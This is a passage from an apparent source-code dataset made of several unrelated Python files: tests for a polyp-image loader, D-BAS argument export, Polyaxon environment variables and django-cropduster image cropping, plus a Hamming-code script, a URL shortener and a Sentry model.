labels, their subset (i.e. category, clip, prefix) and their
filenames.
"""
from skimage import io
image_batch, mask_batch, filename_batch = [], [], []
for prefix, img_name in sequence:
img = io.imread(os.path.join(self.image_path, img_name + ".bmp"))
img = img.astype(floatX) / 255.
mask = np.array(io.imread(os.path.join(self.mask_path,
img_name + ".tif")))
mask = mask.astype('int32')
# Add to minibatch
image_batch.append(img)
mask_batch.append(mask)
filename_batch.append(img_name)
ret = {}
ret['data'] = np.array(image_batch)
ret['labels'] = np.array(mask_batch)
ret['subset'] = prefix
ret['filenames'] = np.array(filename_batch)
return ret
def test():
trainiter = Polyps912Dataset(
which_set='train',
batch_size=10,
seq_per_subset=0,
seq_length=0,
data_augm_kwargs={
'crop_size': (288, 384)},
return_one_hot=True,
return_01c=True,
return_list=True,
use_threads=False)
validiter = Polyps912Dataset(
which_set='valid',
batch_size=1,
seq_per_subset=0,
seq_length=0,
return_one_hot=True,
return_01c=True,
return_list=True,
use_threads=False)
testiter = Polyps912Dataset(
which_set='test',
batch_size=1,
seq_per_subset=0,
seq_length=0,
return_one_hot=True,
return_01c=True,
return_list=True,
use_threads=False)
# Get number of classes
nclasses = trainiter.nclasses
print ("N classes: " + str(nclasses))
void_labels = trainiter.void_labels
print ("Void label: " + str(void_labels))
# Training info
train_nsamples = trainiter.nsamples
train_batch_size = trainiter.batch_size
train_nbatches = trainiter.nbatches
print("Train n_images: {}, batch_size: {}, n_batches: {}".format(
train_nsamples, train_batch_size, train_nbatches))
# Validation info
valid_nsamples = validiter.nsamples
valid_batch_size = validiter.batch_size
valid_nbatches = validiter.nbatches
print("Validation n_images: {}, batch_size: {}, n_batches: {}".format(
valid_nsamples, valid_batch_size, valid_nbatches))
# Testing info
test_nsamples = testiter.nsamples
test_batch_size = testiter.batch_size
test_nbatches = testiter.nbatches
print("Test n_images: {}, batch_size: {}, n_batches: {}".format(
test_nsamples, test_batch_size, test_nbatches))
start = time.time()
tot = 0
max_epochs = 1
for epoch in range(max_epochs):
for mb in range(train_nbatches):
train_group = trainiter.next()
if train_group is None:
raise RuntimeError('One batch was missing')
# train_group checks
assert train_group[0].ndim == 4
assert train_group[0].shape[0] <= train_batch_size
assert train_group[0].shape[1:] == (288, 384, 3)
assert train_group[0].min() >= 0
assert train_group[0].max() <= 1
assert train_group[1].ndim == 4
assert train_group[1].shape[0] <= train_batch_size
assert train_group[1].shape[1:] == (288, 384, nclasses)
# time.sleep approximates running some model
time.sleep(1)
stop = time.time()
part = stop - start - 1
start = stop
tot += part
print("Minibatch %s time: %s (%s)" % (str(mb), part, tot))
def run_tests():
test()
if __name__ == '__main__':
run_tests()
|
StarcoderdataPython
|
1984198
|
<filename>hamming2.py
# код (n, k) n -- символов в код. слове, k -- символов в сообщении
# пор. мат. G размера k×n
# пров. мат. H размер (n-k)×n
G = [
[1, 0, 0, 0, 1, 1, 0],
[0, 1, 0, 0, 1, 0, 1],
[0, 0, 1, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1, 1],
] # (7, 4)
import numpy as np
G = np.array(G)
print(G.T)
# In[0]
H = np.array([
[1, 1, 0, 1, 1, 0, 0],
[1, 0, 1, 1, 0, 1, 0],
[0, 1, 1, 1, 0, 0, 1],
])
# H×G(T) = 0 (mod q)
np.matmul(H,G.T) % 2
# In[0]
def getH(G, p=2):
k, n = G.shape
H = np.zeros(shape=(n-k, n))
for i in range(k, n):
H[i-k, i] = 1
for i in range(k):
for j in range(k, n):
H[j-k, i] = p - G[i, j]
return H
# In[0]
import itertools
def allVectors(len, base=2):
return (np.array(i) for i in itertools.product(range(base), repeat=len))
# In[0]
def lincode(G, p=2):
k,n = G.shape
def encode(m):
return np.reshape(np.matmul(G.T, np.reshape(np.array(m), (k, 1))) % p, n)
d = min(np.count_nonzero(encode(m)) for m in itertools.islice(allVectors(k, p), 1, None))
ec = (d-1)//2
print(f"Code distance is {d}, can correct {ec} errors")
H = getH(G, p)
tbl = {}
for ei in allVectors(n, p):
if 0 < np.count_nonzero(ei) <= ec:
si = np.reshape(np.matmul(H, ei) % p, n-k)
tbl[str(si)] = np.reshape(ei, n)
def decode(c):
s = np.reshape(np.matmul(H, c) % p, n-k)
if np.count_nonzero(s) == 0:
return c[:k]
e = tbl[str(s)]
c1 = c - e
return c1[:k]
return (encode, decode)
encode, decode = lincode(G = np.array([
[1, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 1, 0, 0, 0, 1, 0, 1, 1, 1],
[0, 0, 1, 0, 0, 1, 1, 0, 1, 1],
[0, 0, 0, 1, 0, 1, 1, 1, 0, 1],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 0],
]), p=4) # (10, 5)
decode(encode([2,0,3,0,0])+np.array([2,0,0,0,0,0,0,0,0,0]))
|
StarcoderdataPython
|
265834
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-12-08 06:13
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('bicycleparking', '0002_auto_20171129_0126'),
('bicycleparking', '0002_auto_20171129_0128'),
]
operations = [
]
|
StarcoderdataPython
|
11352168
|
from pathlib import Path
DATA_DIR = Path(__file__).resolve().parent
|
StarcoderdataPython
|
9755674
|
import logging
import os
import shutil
from oslo_config import cfg
LOG = logging.getLogger(__name__)
def execute(filename, formatted_name):
"""Renames a file based on the name generated using metadata.
:param str filename: absolute path and filename of original file
:param str formatted_name: absolute path and new filename
"""
if os.path.isfile(formatted_name):
# If the destination exists, skip rename unless overwrite enabled
if not cfg.CONF.overwrite_file_enabled:
LOG.info('File %s already exists not forcefully moving %s',
formatted_name, filename)
return
LOG.info('renaming [%s] to [%s]', filename, formatted_name)
if not cfg.CONF.dryrun:
shutil.move(filename, formatted_name)
|
StarcoderdataPython
|
8147422
|
<reponame>hhucn/dbas<filename>api/tests/test_exports.py
import arrow
from webtest.response import TestResponse
from api.exports import import_aif
from api.tests.test_views import create_request_with_token_header
from dbas.database.discussion_model import Issue
from dbas.tests.utils import TestCaseWithConfig, test_app
class SaneAIF(TestCaseWithConfig):
def test_cat_or_dog_aif(self):
response: TestResponse = test_app().get("/api/cat-or-dog/aif")
self.assertEqual(response.status_code, 200)
self.assertIn("nodes", response.json_body)
self.assertIn("edges", response.json_body)
self.assertIn({
"nodeID": "statement_24",
"text": "the fact, that cats are capricious, is based on the cats race",
"type": "I",
"timestamp": "2017-08-09T11:25:09.222604+00:00"
}, response.json_body["nodes"])
self.assertIn({
"edgeID": "argument_4_edge_out",
"toID": "statement_3",
"fromID": "argument_4"
}, response.json_body["edges"])
def test_import_not_allowed_for_normie(self):
import_response = import_aif(create_request_with_token_header(nickname="Walter",
match_dict={"slug": "cat-or-dog-2"},
params={"title": "Cat or Dog 2", "lang": "en"},
json_body={}))
self.assertEqual(import_response.status_code, 401)
def test_import(self):
self.config.testing_securitypolicy(userid='Tobias', permissive=True)
import_response = import_aif(create_request_with_token_header(nickname="Tobias",
match_dict={"slug": "my-new-issue"},
params={"title": "My new Issue", "lang": "en"},
json_body={
"nodes": [
{
"nodeID": "argument_1",
"type": "CA",
"timestamp": "2017-08-19T11:25:09.347038+00:00"
},
{
"nodeID": "statement_1",
"text": "This is a Position",
"type": "I",
"timestamp": "2017-08-16T11:25:09.222796+00:00"
},
{
"nodeID": "statement_2",
"text": "This is a Premise",
"type": "I",
"timestamp": "2017-08-16T11:25:09.222796+00:00"
}],
"edges": [
{
"edgeID": "argument_1_edge_out",
"fromID": "argument_1",
"toID": "statement_1"
},
{
"edgeID": "argument_1_edge_in_from_18",
"fromID": "statement_2",
"toID": "argument_1"
}
]
}))
self.assertEqual(import_response.status_code, 201)
new_issue = Issue.by_slug("my-new-issue")
self.assertEqual(new_issue.lang, "en")
self.assertCountEqual([position.get_text() for position in new_issue.positions], ["This is a Position"])
self.assertCountEqual([statement.get_text() for statement in new_issue.statements],
["This is a Position", "This is a Premise"])
self.assertEqual(new_issue.positions[0].get_timestamp(), arrow.get("2017-08-16T11:25:09.222796+00:00"))
self.assertEqual(new_issue.positions[0].arguments[0].timestamp,
arrow.get("2017-08-19T11:25:09.347038+00:00"))
self.assertFalse(new_issue.positions[0].arguments[0].is_supportive,
"Argument with type CA should parse to supportive: False")
class SaneDot(TestCaseWithConfig):
def test_cat_or_dog_dot(self):
response: TestResponse = test_app().get("/api/cat-or-dog/dot")
self.assertEqual(200, response.status_code)
self.assertIsInstance(response.body, bytes)
|
StarcoderdataPython
|
6631991
|
<filename>url_manager/views.py
#coding: utf-8
import re
import urllib
from models import WrongURL, LongURL, ShortURL
BASE62 = '01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
nBASE62 = len(BASE62)
PATTERN = r'http://[^/^\s]+[.]\w{2,4}\S/?'
def get_short_id(url):
u'''긴 URL을 받아서 짧은 URL의 id를 반환'''
if not url:
return WrongURL(0)
elif not re.match(PATTERN, url):
return WrongURL(1)
longUrl, isnew = LongURL.objects.get_or_create(url=url)
if isnew:
id = encode_basen(longUrl.id)
try:
return ShortURL.objects.create(id=id, longUrl=longUrl).id
except:
raise WrongURL(2)
else:
try:
return ShortURL.objects.get(longUrl=longUrl).id
except ShortURL.DoesNotExist:
raise WrongURL(3)
def get_long_url(id):
u'''아이디를 입력받아 인코딩한다'''
try:
return urllib.quote(ShortURL.objects.get(id=id).longUrl.url.encode('utf-8'), safe=':/=\?&')
except:
return ''
def encode_basen(id, n=nBASE62):
u'''아이디를 입력받아 인코딩한다'''
base = id
rests = []
while base!=0:
quotient, rest = divmod(base, n)
rests.append(BASE62[rest])
base = quotient
return ''.join(rests)
|
StarcoderdataPython
|
167432
|
from numpy import pi, isclose
from pyroll.core import CircularOvalGroove
def test_circular_oval():
g = CircularOvalGroove(depth=5.05, r1=7, r2=33)
assert isclose(g.usable_width, 17.63799973 * 2)
assert isclose(g.alpha1, 29.102618 / 180 * pi)
assert isclose(g.alpha2, 29.102618 / 180 * pi)
assert isclose(g.z1, 19.45501221)
|
StarcoderdataPython
|
12854487
|
<filename>test/demo-random.py
import snap
G = snap.GenFull(snap.PNEANet, 100)
# get a new random generator, provide the seed value
Rnd = snap.TRnd(42)
# randomize the generator, every execution will produce a different sequence.
# Comment out the line to get the same sequence on every execution.
Rnd.Randomize()
for i in range(0,10):
# provide the random generator as a parameter to the function
NId = G.GetRndNId(Rnd)
print(NId)
# result is not well formed, the following statement fails
#print(NI.GetId())
|
StarcoderdataPython
|
4908163
|
<filename>core/tests/test_polypod/test_main/test_main_env_vars.py
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from polyaxon.connections.kinds import V1ConnectionKind
from polyaxon.connections.schemas import (
V1BucketConnection,
V1ClaimConnection,
V1K8sResourceSchema,
)
from polyaxon.env_vars.keys import (
POLYAXON_KEYS_COLLECT_ARTIFACTS,
POLYAXON_KEYS_COLLECT_RESOURCES,
POLYAXON_KEYS_LOG_LEVEL,
)
from polyaxon.exceptions import PolypodException
from polyaxon.polyflow import V1Plugins
from polyaxon.polypod.common.env_vars import (
get_connection_env_var,
get_env_var,
get_env_vars_from_k8s_resources,
get_items_from_config_map,
get_items_from_secret,
get_kv_env_vars,
)
from polyaxon.polypod.main.env_vars import get_env_vars
from polyaxon.polypod.specs.contexts import PluginsContextsSpec
from polyaxon.schemas.types import V1ConnectionType, V1K8sResourceType
from tests.utils import BaseTestCase
@pytest.mark.polypod_mark
class TestMainEnvVars(BaseTestCase):
def setUp(self):
super().setUp()
# Secrets
self.resource1 = V1K8sResourceType(
name="non_mount_test1",
schema=V1K8sResourceSchema(name="ref", items=["item1", "item2"]),
is_requested=False,
)
self.resource2 = V1K8sResourceType(
name="non_mount_test2",
schema=V1K8sResourceSchema(name="ref"),
is_requested=False,
)
self.resource3 = V1K8sResourceType(
name="non_mount_test1",
schema=V1K8sResourceSchema(name="ref", items=["item1", "item2"]),
is_requested=True,
)
self.resource4 = V1K8sResourceType(
name="non_mount_test2",
schema=V1K8sResourceSchema(name="ref"),
is_requested=True,
)
self.resource5 = V1K8sResourceType(
name="non_mount_test2",
schema=V1K8sResourceSchema(name="ref"),
is_requested=True,
)
self.resource6 = V1K8sResourceType(
name="mount_test",
schema=V1K8sResourceSchema(name="ref", mount_path="/test"),
is_requested=True,
)
# Connections
self.bucket_store = V1ConnectionType(
name="test_s3",
kind=V1ConnectionKind.S3,
schema=V1BucketConnection(bucket="s3//:foo"),
secret=self.resource3.schema,
)
self.mount_store = V1ConnectionType(
name="test_claim",
kind=V1ConnectionKind.VOLUME_CLAIM,
schema=V1ClaimConnection(
mount_path="/tmp", volume_claim="test", read_only=True
),
)
def test_get_env_vars(self):
assert (
get_env_vars(
contexts=None,
log_level=None,
kv_env_vars=None,
connections=None,
secrets=None,
config_maps=None,
)
== []
)
def test_get_env_vars_with_kv_env_vars(self):
# Check wrong kv env vars
with self.assertRaises(PolypodException):
get_env_vars(
contexts=None,
log_level=None,
kv_env_vars=["x", "y", "z"],
connections=None,
secrets=None,
config_maps=None,
)
with self.assertRaises(PolypodException):
get_env_vars(
contexts=None,
log_level=None,
kv_env_vars={"x": "y"},
connections=None,
secrets=None,
config_maps=None,
)
# Valid kv env vars
assert (
get_env_vars(
contexts=None,
log_level=None,
kv_env_vars=[["key1", "val1"], ["key2", "val2"]],
connections=None,
secrets=None,
config_maps=None,
)
== get_kv_env_vars([["key1", "val1"], ["key2", "val2"]])
)
def test_get_env_vars_with_artifacts_store(self):
assert (
get_env_vars(
contexts=None,
log_level=None,
kv_env_vars=None,
connections=None,
secrets=None,
config_maps=None,
)
== []
)
assert get_env_vars(
contexts=PluginsContextsSpec.from_config(
V1Plugins(
collect_logs=False, collect_artifacts=True, collect_resources=True
)
),
log_level=None,
kv_env_vars=None,
connections=None,
secrets=None,
config_maps=None,
) == [
get_env_var(name=POLYAXON_KEYS_COLLECT_ARTIFACTS, value=True),
get_env_var(name=POLYAXON_KEYS_COLLECT_RESOURCES, value=True),
]
assert (
get_env_vars(
contexts=PluginsContextsSpec.from_config(
V1Plugins(
collect_logs=False,
collect_artifacts=False,
collect_resources=False,
)
),
log_level=None,
kv_env_vars=None,
connections=None,
secrets=None,
config_maps=None,
)
== []
)
assert (
get_env_vars(
contexts=None,
log_level=None,
kv_env_vars=None,
connections=None,
secrets=None,
config_maps=None,
)
== []
)
assert (
get_env_vars(
contexts=PluginsContextsSpec.from_config(
V1Plugins(
collect_logs=False,
collect_artifacts=True,
collect_resources=False,
)
),
log_level=None,
kv_env_vars=None,
connections=None,
secrets=None,
config_maps=None,
)
== [get_env_var(name=POLYAXON_KEYS_COLLECT_ARTIFACTS, value=True)]
)
def test_get_env_vars_with_secrets(self):
assert (
get_env_vars(
contexts=None,
log_level=None,
kv_env_vars=None,
connections=None,
secrets=[self.resource1, self.resource2],
config_maps=None,
)
== get_items_from_secret(secret=self.resource1)
+ get_items_from_secret(secret=self.resource2)
)
assert (
get_env_vars(
contexts=None,
log_level=None,
kv_env_vars=None,
connections=None,
secrets=[
self.resource1,
self.resource2,
self.resource3,
self.resource4,
],
config_maps=None,
)
== get_items_from_secret(secret=self.resource1)
+ get_items_from_secret(secret=self.resource2)
+ get_items_from_secret(secret=self.resource3)
+ get_items_from_secret(secret=self.resource4)
)
def test_get_env_vars_with_config_maps(self):
assert (
get_env_vars(
contexts=None,
log_level=None,
kv_env_vars=None,
connections=None,
secrets=None,
config_maps=[self.resource1, self.resource2],
)
== get_items_from_config_map(config_map=self.resource1)
+ get_items_from_config_map(config_map=self.resource2)
)
assert (
get_env_vars(
contexts=None,
log_level=None,
kv_env_vars=None,
connections=None,
secrets=None,
config_maps=[
self.resource1,
self.resource2,
self.resource3,
self.resource4,
],
)
== get_items_from_config_map(config_map=self.resource1)
+ get_items_from_config_map(config_map=self.resource2)
+ get_items_from_config_map(config_map=self.resource3)
+ get_items_from_config_map(config_map=self.resource4)
)
def test_get_env_vars_with_all(self):
connection = V1ConnectionType(
name="test_s3",
kind=V1ConnectionKind.S3,
schema=V1BucketConnection(bucket="s3//:foo"),
secret=self.resource6.schema,
)
env_vars = get_env_vars(
contexts=PluginsContextsSpec.from_config(
V1Plugins(
collect_logs=False, collect_artifacts=True, collect_resources=True
)
),
log_level="info",
kv_env_vars=[["key1", "val1"], ["key2", "val2"]],
connections=[connection],
secrets=[
self.resource1,
self.resource2,
self.resource3,
self.resource4,
self.resource6,
],
config_maps=[
self.resource1,
self.resource2,
self.resource3,
self.resource4,
],
)
expected = [
get_env_var(name=POLYAXON_KEYS_LOG_LEVEL, value="info"),
get_env_var(name=POLYAXON_KEYS_COLLECT_ARTIFACTS, value=True),
get_env_var(name=POLYAXON_KEYS_COLLECT_RESOURCES, value=True),
]
expected += get_connection_env_var(connection=connection, secret=self.resource6)
expected += get_kv_env_vars([["key1", "val1"], ["key2", "val2"]])
expected += get_env_vars_from_k8s_resources(
secrets=[
self.resource1,
self.resource2,
self.resource3,
self.resource4,
self.resource6,
],
config_maps=[
self.resource1,
self.resource2,
self.resource3,
self.resource4,
],
)
assert env_vars == expected
|
StarcoderdataPython
|
6564418
|
<filename>ansible/tests/DepreciatedStatementUsage.py<gh_stars>1-10
from ansiblelint.rules import RulesCollection
from ansiblelint.runner import Runner
from ansiblelints.stage.DepreciatedStatementUsage import DepreciatedStatementUsage
class TestDepreciatedStatementUsage:
def test_file(self):
collection = RulesCollection()
collection.register(DepreciatedStatementUsage())
file_name = 'testResources/ansible-smell/adminbydefault.yml'
good_runner = Runner(file_name, rules=collection)
print(good_runner.run())
|
StarcoderdataPython
|
1647207
|
<reponame>pitchin/sentry<filename>src/sentry/models/projectownership.py
from __future__ import absolute_import
from jsonfield import JSONField
from django.db import models
from django.utils import timezone
from sentry.db.models import Model, sane_repr
from sentry.db.models.fields import FlexibleForeignKey
from sentry.ownership.grammar import dump_schema, parse_rules
class ProjectOwnership(Model):
__core__ = True
project = FlexibleForeignKey('sentry.Project', unique=True)
raw = models.TextField(null=True)
schema = JSONField(null=True)
fallthrough = models.BooleanField(default=True)
date_created = models.DateTimeField(default=timezone.now)
last_updated = models.DateTimeField(default=timezone.now)
is_active = models.BooleanField(default=True)
class Meta:
app_label = 'sentry'
db_table = 'sentry_projectownership'
__repr__ = sane_repr('project_id', 'is_active')
def save(self, *args, **kwargs):
if self.raw is None:
self.schema = None
else:
self.schema = dump_schema(parse_rules(self.raw))
return super(ProjectOwnership, self).save(*args, **kwargs)
|
StarcoderdataPython
|
1848726
|
<reponame>pbs/django-cropduster
import datetime
import unittest
import os
import hashlib
import shutil
import uuid
from django.conf import settings
PATH = os.path.split(__file__)[0]
from django.db import models
from django.core.files.base import ContentFile
from django.core.exceptions import ObjectDoesNotExist as DNE, ValidationError
import cropduster.models as CM
import cropduster.utils as CMU
from PIL import Image
abspath = lambda x: os.path.join(PATH, x)
to_retina_path = lambda p: '%s@2x%s' % os.path.splitext(p)
def save_all(objs):
for o in objs:
o.save()
def delete_all(model):
for o in model.objects.all():
o.delete()
def hashfile(path):
md5 = hashlib.md5()
with file(path) as f:
data = f.read(4096)
while data:
md5.update(data)
data = f.read(4096)
return md5.digest()
settings.MEDIA_ROOT = settings.STATIC_ROOT = settings.UPLOAD_PATH = '/tmp/cd_test/%s' % uuid.uuid4().hex
ORIG_IMAGE = abspath('testdata/img1.jpg')
TEST_IMAGE = settings.UPLOAD_PATH + '/' + os.path.basename(ORIG_IMAGE)
class TestCropduster(unittest.TestCase):
def setUp(self):
os.makedirs(settings.MEDIA_ROOT)
settings.CROPDUSTER_UPLOAD_PATH = 'cd'
os.system('cp %s %s' % (ORIG_IMAGE, TEST_IMAGE))
# Backup the image
def tearDown(self):
# Delete all objects
delete_all( CM.Image )
delete_all( CM.SizeSet )
delete_all( CM.Size )
delete_all( CM.Crop )
if os.path.exists(settings.UPLOAD_PATH):
os.system('rm -rf %s' % settings.UPLOAD_PATH)
def create_size_sets(self):
iss = CM.SizeSet(name='Facebook', slug='facebook')
iss.save()
thumb = CM.Size(name='Thumbnail',
slug='thumb',
width=60,
height=60,
auto_crop=True,
retina=True,
size_set=iss)
thumb.save()
banner = CM.Size(name='Banner',
slug='banner',
width=1024,
aspect_ratio=1.3,
size_set=iss)
banner.save()
iss2 = CM.SizeSet(name='Mobile', slug='mobile')
iss2.save()
splash = CM.Size(name='Headline',
slug='headline',
width=500,
height=400,
retina=True,
auto_crop=True,
size_set=iss2)
splash.save()
def get_test_image(self, image=TEST_IMAGE):
cd1 = CM.Image(image=image)
cd1.metadata.attribution = "AP",
cd1.metadata.caption = 'This is a galaxy'
cd1.save()
return cd1
def test_original(self):
cd1 = self.get_test_image()
self.assertEquals(cd1.is_original, True)
self.assertEquals(cd1.derived.count(), 0)
def test_size_sets(self):
"""
Tests size sets work correctly on images.
"""
cd1 = self.get_test_image()
self.create_size_sets()
# Add the size set
child_images = cd1.add_size_set(name='Facebook')
# Check that we now have two derived images which haven't been rendered.
self.assertEquals(len(child_images), 2)
self.assert_(all(not ci.image for ci in child_images))
# Should be zero since we haven't saved the images
self.assertEquals(cd1.derived.count(), 0)
save_all(child_images)
self.assertEquals(cd1.derived.count(), 2)
# Try adding it again, which should basically do a no-op
images = cd1.add_size_set(name='Facebook')
# No new image sizes added, so no more images.
self.assertEquals(len(images), 0)
self.assertEquals(cd1.size_sets.count(), 1)
# Try adding one that doesn't exist
self.failUnlessRaises(DNE, cd1.add_size_set, name='foobar')
# Add another new size_set
new_images = cd1.add_size_set(slug='mobile')
self.assertEquals(len(new_images), 1)
save_all(new_images)
self.assertEquals(cd1.derived.count(), 3)
def test_render_original(self):
"""
Tests that we can render the original image.
"""
cd1 = self.get_test_image()
size = CM.Size(name='test', slug='test', width=50,
height=50, auto_crop=True, retina=False)
size.save()
cd1.size = size
# Check that we are protecting original images.
self.failUnlessRaises(ValidationError, cd1.render)
# Get hash of original
orig_hash = hashfile( cd1.image.path )
cd1.render(force=True)
# Check that it hasn't overwritten the original file until we save.
self.assertEquals( hashfile(cd1.image.path), orig_hash)
cd1.save()
# Check that it changed.
self.assertNotEquals(orig_hash, hashfile( cd1.image.path ) )
def test_render_derived(self):
"""
Tests that we can correctly render derived images from the original.
"""
self.create_size_sets()
cd1 = self.get_test_image()
image = cd1.add_size_set(slug='mobile')[0]
image.render()
image.save()
size = image.size
self.assertEquals(image.width, size.width)
self.assertEquals(image.height, size.height)
self.assertNotEquals(image.original.image.path,
image.image.path)
# Check that files are not the same
new_image_hash = hashfile(image.image.path)
self.assertNotEquals(
hashfile( image.original.image.path ),
new_image_hash
)
# Change the original image, and check that the derived image
# also changes when re-rendered.
cd1.size = CM.Size.objects.get(slug='thumb')
cd1.render(force=True)
cd1.save()
image.render()
image.save()
self.assertNotEquals(
hashfile(image.image.path),
new_image_hash
)
# Check that the images are relative
self.assert_(not os.path.isabs(cd1.image.name))
def test_delete(self):
"""
Tests that deletion cascades from the root to all derived images.
"""
self.create_size_sets()
cd1 = self.get_test_image()
for image in cd1.add_size_set(slug='facebook'):
image.render()
image.save()
for image in image.add_size_set(slug='facebook'):
image.render()
image.save()
self.assertEquals(CM.Image.objects.count(), 5)
cd1.delete()
self.assertEquals(CM.Image.objects.count(), 0)
def test_multi_level_delete(self):
"""
Creates a multi-level tree from one image and deletes it.
"""
self.create_size_sets()
cd1 = self.get_test_image()
stack = [cd1]
for i,image in enumerate(stack):
for size_set in CM.SizeSet.objects.all():
for new_image in image.add_size_set(size_set):
new_image.render()
new_image.save()
stack.append(new_image)
if i > 20:
break
# We should have a lot of images.
self.assertEquals(CM.Image.objects.count(), len(stack))
cd1.delete()
self.assertEquals(CM.Image.objects.count(), 0)
def test_manual_derive(self):
"""
Tests that we can do one-off derived images.
"""
self.create_size_sets()
cd1 = self.get_test_image()
img = cd1.new_derived_image()
size = CM.Size.objects.create(slug='testing',
width=100,
height=100,
auto_crop=True,
retina=True)
# Test the manual size exists
self.assertEquals(CM.Size.objects.count(), 4)
self.assertEquals( cd1.has_size('testing'), False )
img.size = size
# Check that the crop is deleted as well
img.set_crop(0, 0, 200, 200).save()
self.assertEquals(CM.Crop.objects.count(), 1)
img.render()
img.save()
self.assertEquals( cd1.has_size('testing'), True )
self.assertEquals(img.width, 100)
self.assertEquals(img.height, 100)
# Test that the manual size is deleted with the image.
img.delete()
self.assertEquals(CM.Size.objects.count(), 3)
self.assertEquals(CM.Size.objects.filter(pk=size.id).count(), 0)
self.assertEquals(CM.Crop.objects.count(), 0)
# No more derived images.
self.assertEquals(cd1.derived.count(), 0)
def test_crop(self):
cd1 = self.get_test_image()
img = cd1.new_derived_image()
img.set_crop(100,100,300,300).save()
img.render()
img.save()
self.assertEquals(img.width, 300)
self.assertEquals(img.height, 300)
def test_no_modify_original(self):
"""
Makes sure that a derived image cannot overwrite an original.
"""
cd1 = self.get_test_image()
orig_hash = hashfile(cd1.image.path)
img = cd1.new_derived_image()
img.set_crop(100, 100, 300, 300).save()
img.render()
img.save()
self.assertEquals(orig_hash, hashfile(cd1.image.path))
self.assertNotEquals(orig_hash, hashfile(img.image.path))
def test_calc_sizes(self):
"""
Tests that omitted dimension details are correctly calculated.
"""
size = CM.Size(slug='1', width=100, aspect_ratio=1.6)
self.assertEquals(size.get_height(), round(100/1.6))
size2 = CM.Size(slug='2', height=100, aspect_ratio=2)
self.assertEquals(size2.get_width(), 200)
size3 = CM.Size(slug='3', height=3, width=4)
self.assertEquals(size3.get_aspect_ratio(), 1.33)
def test_variable_sizes(self):
"""
Tests that variable sizes work correctly.
"""
cd1 = self.get_test_image()
img = cd1.new_derived_image()
size = CM.Size(slug='variable', width=100, aspect_ratio=1.6)
size.save()
img.size = size
img.render()
img.save()
self.assertEquals(size.get_height(), img.height)
# Only width or only height
size = CM.Size(slug='width_only', width=100)
img.size = size
img.render()
img.save()
self.assertEquals(img.width, 100)
self.assertEquals(int(round(100/cd1.aspect_ratio)), img.height)
self.assertEquals(cd1.aspect_ratio, img.aspect_ratio)
size = CM.Size(slug='height_only', height=100)
img.size = size
img.render()
img.save()
self.assertEquals(img.height, 100)
self.assertEquals(int(round(100 * cd1.aspect_ratio)), img.width)
self.assertEquals(cd1.aspect_ratio, img.aspect_ratio)
def _test_delete_images(self):
"""
Check that all image files are correctly deleted. Commented out since
right now we don't really care about it.
"""
self.create_size_sets()
cd1 = self.get_test_image()
paths = []
for image in cd1.add_size_set(slug='facebook'):
image.render()
image.save()
paths.append(image.image.path)
# Check that the paths are unique
self.assertEquals(len(paths), len(set(paths)))
for path in paths:
self.assert_(os.path.exists(path), "Image at %s does not exist!" % path)
cd1.delete()
for path in paths:
self.assert_(not os.path.exists(path), "Image at %s was not deleted!" % path)
def test_retina_image(self):
"""
Tests that retina images are properly rendered when they can be.
"""
cd1 = self.get_test_image()
size1 = CM.Size(slug='thumbnail',
width=128,
height=128,
retina=True)
size1.save()
img1 = cd1.new_derived_image()
img1.size = size1
img1.render()
img1.save()
# Retina images can't be handled directly, they only give a path.
self.assertEquals(img1.retina_path,
to_retina_path(img1.image.path))
retina = Image.open(img1.retina_path)
self.assertEquals(retina.size, (img1.width*2, img1.height*2))
# Check that the retina is removed if the retina would be too large.
size1.width = cd1.width - 20
size1.height = cd1.height - 20
size1.save()
img1.render()
# Check we don't prematurely delete the retina
self.assert_(os.path.isfile(img1.retina_path))
img1.save()
self.assert_(not os.path.isfile(img1.retina_path))
def test_size_aspect_ratio(self):
"""
Tests that a bug in setting of aspect ratio is fixed.
"""
size = CM.Size(slug='test', width=100, aspect_ratio=12)
size.save()
self.assertEquals(size.aspect_ratio, 12)
def test_bad_mimetype(self):
"""
Tests that we can handle incorrectly extensioned images.
"""
NEW_TEST_IMAGE = TEST_IMAGE + '.gif.1'
shutil.copyfile(TEST_IMAGE, NEW_TEST_IMAGE)
cd1 = self.get_test_image(NEW_TEST_IMAGE)
img = cd1.new_derived_image()
size = CM.Size(slug='thumbnail',
width=128,
height=128,
retina=True)
size.save()
img.size = size
# Since the the extension is clearly incorrect (should be jpeg), it should still
# save it as jpeg
img.render()
img.save()
def test_attribution_cascade(self):
"""
Tests that attribution is correctly propagated through from originals
to children.
"""
cd1 = self.get_test_image()
img = cd1.new_derived_image()
img.set_manual_size(width=100, height=100).save()
img.render()
img.save()
self.assertEquals(img.metadata.attribution,
cd1.metadata.attribution)
self.assertEquals(img.metadata.caption,
cd1.metadata.caption)
def test_recursive_save(self):
"""
Tests that we recursively save all root and intermediate images
when saving a leaf image, if they have not been saved.
"""
cd1 = CM.Image(image=TEST_IMAGE)
d1 = cd1.new_derived_image()
d2 = d1.new_derived_image()
d3 = d2.new_derived_image()
d4 = d3.new_derived_image()
# Nothing's been saved, so nothing should have an id.
images = (cd1, d1, d2, d3)
for i in images:
self.assertEquals(i.pk, None)
# Save partway
d2.save()
# Check that the ancestors were saved.
last = None
for i in (cd1, d1, d2):
self.assert_(i.pk > last)
last = i.pk
# Check that the descendents are NOT saved
for i in (d3,d4):
self.assertEquals(i.pk, None)
d4.save()
last = None
for i in images:
self.assert_(i.pk > last)
last = i.pk
def test_variable_dimension(self):
"""
Tests that variable dimensions work properly.
"""
cd1 = self.get_test_image()
img = cd1.new_derived_image()
size = CM.Size(slug='thumbnail',
width=128,
retina=True)
size.save()
img.size = size
img.set_crop(100,100,400,400).save()
img.render()
img.save()
self.assertEquals(img.width, 128)
